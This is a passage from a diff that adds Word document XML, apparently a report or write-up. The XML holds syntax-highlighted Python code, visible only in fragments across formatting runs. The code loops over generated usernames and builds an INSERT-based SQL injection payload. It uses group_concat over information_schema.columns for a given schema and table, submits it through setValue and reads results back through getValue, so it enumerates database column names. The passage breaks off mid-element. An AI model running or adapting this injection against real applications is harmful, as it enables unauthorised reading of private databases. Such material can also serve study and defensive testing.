+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>table</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>False</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>while</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> != </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>True</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}{1}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"'),('</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>','pw', (SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{1}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>' AND table_name='</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{2}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>' LIMIT 0,1)); -- -"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>table</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>setValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> += </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
